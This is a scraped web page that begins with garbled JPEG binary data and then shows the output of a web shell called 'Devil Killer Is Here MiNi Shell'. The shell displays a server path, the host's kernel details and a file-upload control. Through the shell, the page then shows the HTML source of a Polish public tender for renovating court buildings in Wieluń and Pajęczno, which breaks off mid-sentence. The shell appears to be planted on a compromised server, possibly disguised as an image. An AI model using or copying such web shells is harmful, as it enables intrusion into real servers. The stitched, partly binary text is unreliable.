JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220610/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220610/0020510101-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Remont pomieszczeń Sądu Rejonowego w Wieluniu i w Pajęcznie. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Sąd Rejonowy w Wieluniu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000323358</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Pl. Jagielloński 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wieluń</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">98-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL714 - Sieradzki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">43 84 20 113</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gospodarczy@wielun.sr.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.wielun.sr.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ kontroli państwowej i ochrony prawa oraz sąd i trybunał</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Porządek i bezpieczeństwo publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Remont pomieszczeń Sądu Rejonowego w Wieluniu i w Pajęcznie. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-2fe70817-e8b4-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00205101</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-06-10</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00090082/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Remont pomieszczeń Sądu Rejonowego w Wieluniu polegający na renowacji ścian, wymianie okładzin podłogowych oraz przebudowie sanitariatu.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-2fe70817-e8b4-11ec-9a86-f6f4c648a056 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.ms.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Informacje dotyczące<br/>przedmiotowego postepowania, w tym w szczególności zmiany i wyjaśnienia treści SWZ oraz inne dokumenty zamówienia<br/>bezpośrednio związane z postepowaniem, będą umieszczane na stronie prowadzonego postepowania pod adresem :<br/>https://ezamowienia.ms.gov.pl<br/>2. Komunikacja w postepowaniu, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między<br/>Zamawiającym a Wykonawca z uwzględnieniem wyjątków określonych w ustawie Pzp odbywa się przy użyciu środków komunikacji<br/>elektronicznej tj. za pomocą systemu SmartPzp pod adresem: https://ezamówienia.ms.gov.pl<br/>3. Informacje o sposobie porozumiewania się Zamawiającego z Wykonawcami oraz przekazywania oświadczeń i dokumentów<br/>znajdują się w rozdziale 8 SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP/3/2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Remont obejmie budynek Sądu Rejonowego w Wieluniu przy Placu Jagiellońskim 1.<br/>Zakres robót budowlanych obejmujących budynek Sądu Rejonowego w<br/>Wieluniu:<br/>1) malowanie sal rozpraw , pomieszczeń biurowych w zakresie ścian i sufitów:<br/>• wyniesienie mebli oraz ponowne wniesienie po wykonaniu prac<br/>• demontaż listew przyściennych i zdjęcie wykładziny dywanowej<br/>• wylewki samopoziomujące<br/>• wykonanie posadzek z wykładzin tekstylnych rulonowe klejone do podkładu<br/>oraz wykładzin dywanowych<br/>• przygotowanie podłoża i powierzchni pod malowanie farbami emulsyjnymi<br/>• dwukrotne malowanie starych tynków wewnętrznych sufitów i ścian<br/>• dwukrotne malowanie farba olejna stolarki drzwiowej<br/>• dwukrotne malowanie farbą olejną grzejników rurowo-żebrowych<br/>2) roboty budowlane:<br/>• wykucie z muru ościeżnic, krat, demontaż skrzydeł drzwiowych oraz ich<br/>osadzenie<br/>• rozbiórka oblicowań ścian z płytek, zerwanie płytek posadzkowych<br/>• rozebranie ścianki z cegieł i elementów konstrukcji betonowych niezbrojonych<br/>• demontaż sufitu podwieszanego z paneli PCV i starej stolarki okiennej<br/>• wykonanie posadzek cementowych z cokolikami, wykonanie izolacji<br/>• postawienie ścianek działowych, wykonanie tynków, gruntowanie podłoży<br/>• licowanie ścian płytkami na klej metodą kombinowaną<br/>• otynkowanie styków ościeżnic ze ścianami<br/>4<br/>• montaż kratek wentylacyjnych sufitowych VENTS 60x60<br/>• montaż nawiewników okiennych w oknach PCV<br/>• czyszczenie kanałów wentylacyjnych<br/>• pomiary skuteczności wentylacji<br/>• wykonanie sufitów podwieszanych, wykonanie wylewek, ułożenie posadzek<br/>• montaż okien uchylnych, lustra łazienkowego, wentylatora<br/>• wyposażenie łazienki i pokoju gospodarczego, zabudowa blatu pod umywalkę<br/>• wywiezienie gruzu i utylizacja odpadów<br/>3) roboty sanitarne:<br/>• demontaż ustępu, pisuaru, grzejnika, baterii, zaworu czerpalnego<br/>• demontaż podejścia odpływowego, instalacji wodnych oraz rurociągu z PCV<br/>• demontaż oraz montaż hydrantu ściennego, węża hydrantowego oraz skrzynki<br/>hydrantowej z wymianą podejścia pod hydrant<br/>• montaż rurociągów z PCV na ścianach z łączeniem metodą wciskową<br/>• wykonanie podejść odpływowych<br/>• montaż rurociągów w instalacjach wodociągowych, baterii, spłuczek,<br/>umywalek<br/>• montaż zaworów przelotowych i zwrotnych sieci wodociągowych, zaworów<br/>czerpalnych, wykucie oraz wymiana rurek CO<br/>• wymiana uszczelnień pionów deszczowych<br/>4) roboty elektryczne:<br/>• demontaż opraw żarowych z kloszem kulistym,<br/>• mechaniczne wykucie bruzd dla przewodów z ich zaprawieniem<br/>• położenie przewodów kabelkowych w gotowych bruzdach,<br/>• przygotowanie podłoża pod oprawy oświetleniowe przykręcane na betonie<br/>mocowane na kołkach kotwiących<br/>• montaż z podłączeniem na gotowym podłożu opraw ledowych<br/>• wymiana wyłącznika, przełącznika 1-biegunowego lub przycisku na cegle<br/>• wymiana opraw oświetleniowych świetlówkowych<br/>• montaż do gotowego podłoża gniazd wtyczkowych podtynkowych z<br/>uziemieniem w puszkach z podłączeniem, pomiar rezystancji izolacji instalacji<br/>elektrycznych </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45210000-2 - Roboty budowlane w zakresie budynków</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45215000-7 - Roboty budowlane w zakresie budowy obiektów budowlanych opieki zdrowotnej i społecznej, krematoriów oraz obiektów użyteczności publicznej</p> <p class="mb-0">45440000-3 - Roboty malarskie i szklarskie</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">45430000-0 - Pokrywanie podłóg i ścian</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">4 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Wybór oferty dokonany zostanie na podstawie niżej przedstawionych kryteriów (nazwa kryterium,<br/>waga, sposób punktowania) dotyczy wszystkich części zamówienia :<br/>Lp. KRYTERIUM: WAGA:<br/>1 Cena 60%<br/>2 Termin gwarancji 40%<br/>R a z e m 100%<br/>17.2 Sposób obliczania wartości punktowej ocenianego kryterium:<br/>1). Kryterium nr 1 – CENA :<br/>najniższa cena oferty brutto<br/>Pc = -------------------------------------------------- x 100 pkt x 60%<br/>cena badanej oferty brutto<br/>a) Podstawą przyznania punktów w kryterium „cena” będzie cena ofertowa brutto podana przez Wykonawcę w Formularzu<br/>Ofertowym.<br/>b) Cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu<br/>zamówienia.<br/>17.3. KRYTERIUM TERMIN GWARANCJI Tg – waga 40%<br/>a) Termin gwarancji na wykonane roboty i usługi oraz zastosowane materiały. Termin ten musi być określony w przedziale od 36<br/>miesięcy do 60 miesięcy. W przypadku zaoferowania terminu krótszego niż 36 miesięcy oferta zostanie odrzucona, natomiast w<br/>przypadku zaoferowania terminu dłuższego niż 60 miesięcy oferta zostanie oceniona tak samo jak by Wykonawca zaoferował 60-<br/>miesięczną gwarancję. Jeśli Wykonawca nie wskaże żadnego terminu Zamawiający przyjmie, że Wykonawca zaoferował termin<br/>minimalny.<br/>b) Kryterium termin gwarancji (Tg) będzie rozpatrywana na podstawie oświadczenia Wykonawcy zawartego w ofercie:<br/>Oferty ocenione zostaną wg poniższego wzoru:<br/>TgOC<br/>Liczba punktów oferty (Tg) = ------------------------- x 100 pkt x 40%<br/>TgNTG<br/>gdzie:<br/>TGOC - termin gwarancji oferty ocenianej<br/>TGNTG – najdłuższy termin gwarancji<br/>Uwaga! Wykonawca winien podać okres gwarancji w pełnych miesiącach (punkty w powyższym kryterium przyznane zostaną tylko<br/>za pełne miesiące).<br/>17.4. Sposób obliczenia punktacji dla całej oferty<br/>Za ofertę najkorzystniejszą uznana zostanie oferta, która uzyska najwyższą liczbę punktów wyliczoną jako sumę punktów<br/>uzyskanych w ww. kryteriach z uwzględnieniem ich wag.<br/>Suma punktów uzyskanych przez Wykonawcę dla poszczególnych kryteriów, stanowić będzie podstawę wyboru oferty<br/>najkorzystniejszej. Za najkorzystniejszą uznana zostanie ta oferta, która uzyska łącznie najwyższą liczbę punktów w spośród<br/>wszystkich ofert niepodlegających odrzuceniu.<br/>Maksymalna łączna liczba punktów, jaką może uzyskać oferta danego Wykonawcy, wynosi – 100 pkt.<br/>17.5. Obliczenia dokonywane będą z dokładnością do dwóch miejsc po przecinku, zgodnie z matematycznymi zasadami<br/>zaokrąglania.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zakres robót budowlanych obejmujących budynek Wydziałów Zamiejscowych <br/>Sądu Rejonowego w Wieluniu z siedzibą w Pajęcznie: <br/>1) malowanie sal rozpraw , pomieszczeń biurowych w zakresie ścian i sufitów: <br/>• wyniesienie mebli oraz ponowne wniesienie po wykonaniu prac <br/>• demontaż listew przyściennych i zdjęcie wykładziny dywanowej <br/>• wylewki samopoziomujące <br/>• wykonanie posadzek z wykładzin tekstylnych rulonowe klejone do podkładu <br/>oraz wykładzin dywanowych <br/>• przygotowanie podłoża i powierzchni pod malowanie farbami emulsyjnymi <br/>• dwukrotne malowanie starych tynków wewnętrznych sufitów i ścian <br/>2) malowanie ciągów komunikacyjnych — korytarzy, wiatrołapu, klatek schodowych, <br/>innych pomieszczeń oraz uzupełnienie płytek <br/>• rozebranie posadzki z płytek oraz ułożenie posadzki z kamieni sztucznych - <br/>płytki układane na klej metodą zwykłą<br/>• zdjęcie wykładziny dywanowej <br/>• przygotowanie powierzchni pod malowanie farbami emulsyjnymi <br/>• dwukrotne malowanie starych tynków wewnętrznych sufitów i ścian <br/>3) roboty budowlane: <br/>• usunięcie skutków awarii wodno-kanalizacyjnej w pomieszczeniu WC dla <br/>personelu, zabudowa pionu płytami gipsowo-kartonowymi na rusztach <br/>metalowych <br/>4 <br/>• utylizacja odpadów powstających w wyniku demontażu wykładzin <br/>4) roboty elektryczne: <br/>• wymiana opraw oświetleniowych świetlówkowych </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45210000-2 - Roboty budowlane w zakresie budynków</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45215000-7 - Roboty budowlane w zakresie budowy obiektów budowlanych opieki zdrowotnej i społecznej, krematoriów oraz obiektów użyteczności publicznej</p> <p class="mb-0">45440000-3 - Roboty malarskie i szklarskie</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">45430000-0 - Pokrywanie podłóg i ścian</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">4 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Wybór oferty dokonany zostanie na podstawie niżej przedstawionych kryteriów (nazwa kryterium,<br/>waga, sposób punktowania) dotyczy wszystkich części zamówienia :<br/>Lp. KRYTERIUM: WAGA:<br/>1 Cena 60%<br/>2 Termin gwarancji 40%<br/>R a z e m 100%<br/>17.2 Sposób obliczania wartości punktowej ocenianego kryterium:<br/>1). Kryterium nr 1 – CENA :<br/>najniższa cena oferty brutto<br/>Pc = -------------------------------------------------- x 100 pkt x 60%<br/>cena badanej oferty brutto<br/>a) Podstawą przyznania punktów w kryterium „cena” będzie cena ofertowa brutto podana przez Wykonawcę w Formularzu<br/>Ofertowym.<br/>b) Cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu<br/>zamówienia.<br/>17.3. KRYTERIUM TERMIN GWARANCJI Tg – waga 40%<br/>a) Termin gwarancji na wykonane roboty i usługi oraz zastosowane materiały. Termin ten musi być określony w przedziale od 36<br/>miesięcy do 60 miesięcy. W przypadku zaoferowania terminu krótszego niż 36 miesięcy oferta zostanie odrzucona, natomiast w<br/>przypadku zaoferowania terminu dłuższego niż 60 miesięcy oferta zostanie oceniona tak samo jak by Wykonawca zaoferował 60-<br/>miesięczną gwarancję. Jeśli Wykonawca nie wskaże żadnego terminu Zamawiający przyjmie, że Wykonawca zaoferował termin<br/>minimalny.<br/>b) Kryterium termin gwarancji (Tg) będzie rozpatrywana na podstawie oświadczenia Wykonawcy zawartego w ofercie:<br/>Oferty ocenione zostaną wg poniższego wzoru:<br/>TgOC<br/>Liczba punktów oferty (Tg) = ------------------------- x 100 pkt x 40%<br/>TgNTG<br/>gdzie:<br/>TGOC - termin gwarancji oferty ocenianej<br/>TGNTG – najdłuższy termin gwarancji<br/>Uwaga! Wykonawca winien podać okres gwarancji w pełnych miesiącach (punkty w powyższym kryterium przyznane zostaną tylko<br/>za pełne miesiące).<br/>17.4. Sposób obliczenia punktacji dla całej oferty<br/>Za ofertę najkorzystniejszą uznana zostanie oferta, która uzyska najwyższą liczbę punktów wyliczoną jako sumę punktów<br/>uzyskanych w ww. kryteriach z uwzględnieniem ich wag.<br/>Suma punktów uzyskanych przez Wykonawcę dla poszczególnych kryteriów, stanowić będzie podstawę wyboru oferty<br/>najkorzystniejszej. Za najkorzystniejszą uznana zostanie ta oferta, która uzyska łącznie najwyższą liczbę punktów w spośród<br/>wszystkich ofert niepodlegających odrzuceniu.<br/>Maksymalna łączna liczba punktów, jaką może uzyskać oferta danego Wykonawcy, wynosi – 100 pkt.<br/>17.5. Obliczenia dokonywane będą z dokładnością do dwóch miejsc po przecinku, zgodnie z matematycznymi zasadami<br/>zaokrąglania.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 21.1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące:<br/>21.1.1. sytuacji ekonomicznej lub finansowej dla części I i II:<br/>Wykonawca spełni warunek, jeśli wykaże, że posiada ubezpieczenie odpowiedzialności cywilnej z tytułu prowadzonej<br/>działalności gospodarczej związanej z przedmiotem zamówienia na sumę gwarancyjną wynoszącą co najmniej 200 000,00<br/>zł (dwieście tysięcy złotych).<br/>21.1.2. zdolności technicznej lub zawodowej.<br/>dla części I i II:<br/>Wykonawca spełni warunek, jeżeli wykaże, że w okresie ostatnich 5 lat (a jeżeli okres prowadzenia działalności jest krótszy<br/>– w tym okresie) przed upływem terminu składania ofert wykonali w sposób należyty, zgodnie z przepisami 